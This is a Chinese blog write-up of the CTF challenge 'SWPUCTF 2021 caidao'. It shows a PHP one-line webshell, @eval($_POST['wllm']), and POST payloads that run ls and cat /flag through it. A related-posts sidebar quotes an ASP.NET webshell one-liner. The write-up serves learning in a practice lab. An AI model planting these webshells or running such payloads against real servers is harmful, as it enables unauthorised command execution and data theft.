NSSCTF | [SWPUCTF 2021 新生赛]caidao

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量188 收藏 4
点赞数 8
分类专栏: NSSCTF 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80946742/article/details/138698162
版权

打开题目,只有一个图片,图片中间是一个一句话木马的一部分,意思是服务器可以执行通过POST的请求方式传入参数为wllm的命令,那这就是典型的命令执行,当然,也可以使用蚁剑或者菜刀连接这个木马

一句话木马的详细介绍可以参考我的这篇文章

最新upload-labs文件上传漏洞靶场搭建安装,upload-labs Pass01-Pass20 二十关详解,靶场源码详解,upload-labs第一关到第二十关详解,一句话木马详细介绍-CSDN博客

@eval($_POST['wllm']);

我们首先使用命令执行来做一下这个题目

这里使用到的工具是HackBar

使用HackBar传入参数为wllm的ls命令,可以看到左上角有回显,展示了当前目录下的文件,说明命令有用

wllm=system('ls');

看不清的话,可以Ctrl+U查看网页源代码

然后返回根目录看看有什么

wllm=system('ls /');

可以直接看到flag文件

然后cat命令查看就能得到flag

wllm=system('cat /flag');

本题完。

Hackerdallas
关注
  • 8
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
NSSCTF刷题笔记web6——[SWPUCTF 2021 新生]caidao
qq_45692883的博客
01-18 496
题目也是非常的简洁明了,考点可能是菜刀的使用,所以稍微绕一下,用菜刀来get shell。直接输入网址以及密码和脚本格式,就可以获取shell。caidao是一款shell管理工具。
NSSCTF题库[SWPUCTF 2021 新生]+部分新生签到题
热门推荐
J1ng_Hong的博客
10-27 1万+
发现题目需要我们用php伪协议,并且需要前三位是php三个字母。此时我们上网搜索,发现了php://filter可以读取文件。在后面加上write=string.rot13/resource=flag即可。首先一进来就是源码代码审计,非常简单的绕过。其中string.rot13为字符串过滤器。
[SWPUCTF 2021 新生]caidao
2301_80358831的博客
04-18 352
[SWPUCTF 2021 新生]caidao 题目解析
[SWPUCTF] 2021新生之(NSSCTF)刷题记录 ①
Aluxian_的博客
04-17 1755
[SWPUCTF] 2021新生之(NSSCTF)刷题记录wp
[SWPUCTF 2021 新生]WEB刷题记录
m0_73239569的博客
11-13 193
从POST请求中获取名为'id'的变量值,并从GET请求中获取名为'json'的变量值。就可以输出名为'flag'的变量的值。按照要求格式,flag为:NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}之后执行,得到flag:NSSCTF{b3431475-1ea5-46a1-bda1-b269bd451f46}之后告诉我们当'id'等于"wllmNB"且'json'数组中的'x'键对应的值为"wllm"打开之后,根据题目提示直接F12,在源码中搜索CTF得到flag。
[SWPUCTF 2021 新生] - web
qq_44640313的博客
01-30 1043
[SWPUCTF 2021 新生] web方向的wp,有一个phar反序列化的题做不动了
NSSCTF】刷题记录——[SWPUCTF 2021 新生]系列(WEB篇)
jameshuangchuan的博客
08-08 2637
此处主要在NSSCTF平台()上开展刷题。
[SWPUCTF 2021 新生]第一波放题(nssctf刷题)
weixin_63231007的博客
04-09 8905
[SWPUCTF 2021 新生]jicao json_decode介绍: json_decode (PHP 5 >= 5.2.0, PECL json >= 1.2.0) json_decode — 对 JSON 格式的字符串进行编码 说明 mixed json_decode ( string $json [, bool $assoc ] ) 接受一个 JSON 格式的字符串并且把它转换为 PHP 变量 参数 json 待解码的 json string 格式的字符串。 asso
caidao.rar_caidao web_webshell_入侵检测系统
09-15
web系统管理工具,用于入侵检测,中国开发者使用。
caidao-20141213.zip
04-10
caidao-20141213.zip
caidao 一款不错的网站管理工具
06-02
一款不错的网站管理工具,可以方便的上传、下载文件到你的网站, 主程序的 hash 值如下: MD5:ac86066ffd58779f4c0db5030574b0cb SHA1:02c1725fa5865a4be0f4a040bfdbc4b30b628d8c
caidao:golang版本菜鸟级菜刀
05-16
菜鸟级golang菜刀 因为不想装java的环境......到当前目中cmd 执行 caidao.exe (windows) 上传见不得人的小文件 .. 这里就不讨论怎么能通过x洞上传小文件 上传文件 目前我就写了php的版本 cus.php (主要文件) fi
caidao-20160622-www.maicaidao.com.rar
05-12
菜刀 / Caidao @ ...  ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["caidao"],"unsafe");%> 2)自己开发的脚本程序(Customize): 理论上支持所有动态脚本,只要正确与菜刀进
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 168
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 937
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
360数字安全:2024年3月勒索软件流行态势分析报告
2301_76786857的博客
06-08 312
勒索软件传播至今,360 反勒索服务已累计接收到数万勒索软件感染求助。随着新型勒索软件的快速蔓延,企业数据泄露风险不断上升,勒索金额在数百万到近亿美元的勒索案件不断出现。360全网安全大脑针对勒索软件进行了全方位的监测与防御,为需要帮助的用户提供 360 反勒索服务。本月针对国内主流云服务器进行的勒索攻击比例大幅提高,从大量的云服务器用户反馈的案例看,相关系统均未安装 360终端安全产品进行勒索防护,被攻击的直接原因主要是 Web 服务漏洞、数据库弱口令登录、远程桌面弱口令登录,
安全漏洞扫描工具
weixin_45639224的博客
06-05 579
安全漏洞扫描工具
操作系统安全:Windows系统安全配置,Windows安全基线检查加固
wangyuxiang946的博客
06-11 1144
Windows安全基线检查标准,Windows加固方式
caidao设计网怎么样
05-08
作为一个专业的设计创意网站,Caidao设计网向来备受业内人士和用户的好评。首先,它提供了丰富多样的设计类别,包括品牌设计、网站设计、平面设计、包装设计和视频设计等,并且每个设计类别下还有不同的设计主题和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值